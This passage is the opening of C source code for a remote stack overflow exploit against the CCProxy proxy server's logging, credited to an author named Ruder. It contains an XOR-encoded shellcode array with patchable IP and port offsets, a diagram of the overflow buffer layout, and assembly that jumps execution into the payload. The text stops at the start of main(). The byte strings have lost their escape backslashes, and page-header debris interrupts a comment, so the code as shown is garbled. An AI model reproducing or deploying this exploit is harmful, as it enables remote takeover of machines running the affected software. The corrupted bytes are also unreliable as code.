1 #include <stdio.h>
2 #include <windows.h>
3 #include <winsock.h>
4
5 #pragma comment(lib, "ws2_32")
6
7
8 unsigned char EndChar[]=
9 "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A";
10 // HTTP/1.0
11
12 unsigned char shellcode[] =
13 "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05"
14
15 "xe8xedxffxffxff"
16
17 /* 254 bytes shellcode, xor with 0xee */
18 /* offset 92=IP offset 99=PORT*/
19 "x07x36xeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65"
20
21 "x9exf2x43x65x86xe6x65x19x84xeaxb7x06x96xeexeexee"
22
23 "x0cx17x86xddxdcxeexeex86x99x9dxdcxb1xbax11xf8x7b"
24
25 "x84xedxb7x06x8exeexeexeex0cx17xbfxbfxbfxbfx84xef"
26
27 "x84xecx11xb8xfex7dx86x91xeexeexefx86xecxeexeexdb"
28
29 "x65x02x84xfexbbxbdx11xb8xfax6bx2ex9bxd6x65x12x84"
30
31 "xfcxb7x45x0cx13x88x29xaaxcaxd2xefxefx7dx45x45x45"
32
33 "x65x12x86x8dx83x8axeex65x02xbex63xa9xfexb9xbexbf"
34
35 "xbfxbfx84xefxbfxbfxbbxbfx11xb8xeax84x11x11xd9x11"
36
37 "xb8xe2x11xb8xf6x11xb8xe6xbfxb8x65x9bxd2x65x9axc0"
38
39 "x96xedx1bxb8x65x98xcexedx1bxddx27xa7xafx43xedx2b"
40
41 "xddx35xe1x50xfexd4x38x9axe6x2fx25xe3xedx34xaex05"
42
43 "x1fxd5xf1x9bx09xb0x65xb0xcaxedx33x88x65xe2xa5x65"
44
45 "xb0xf2xedx33x65xeax65xedx2bx45xb0xb7x2dx06xcdx11"
46
47 "x11x11x60xa0xe0x02x9cx10x5dxf8x01x20x0ex8ex43x37"
48
49 "xebx20x37xe7x1bx43x02x17x44x8ex09x97x28x97";
50
51 /*
52
Page 1/5
CCProxy Log Remote Stack Overflow Exploit
Ruder
11/09/2004
53 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
54 | |inc edx...inc edx|shellcode|0x7ffa54cd| | |
55 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
56 +0x42 +shellcode +IPLen( IP )=4065
57
58 :
59 mov ecx,0x12811111
60 shr ecx,0x14
61 sub esp,ecx
62 jmp esp
63
64
65 1.
66 2. ecx inc edx
67 */
68
69 void start(void)
70 {
71 printf("CCProxy Log Stack Overflow Exploit!n");
72 printf("written by Ruder 11/2004n");
73 printf("Bug found by Isno,See xfocus.comn");
74 printf("Homepage:http://ruder.cdut.netn";);
75 printf("E−mail:cocoruder@163.comn");
76 }
77
78 int main(int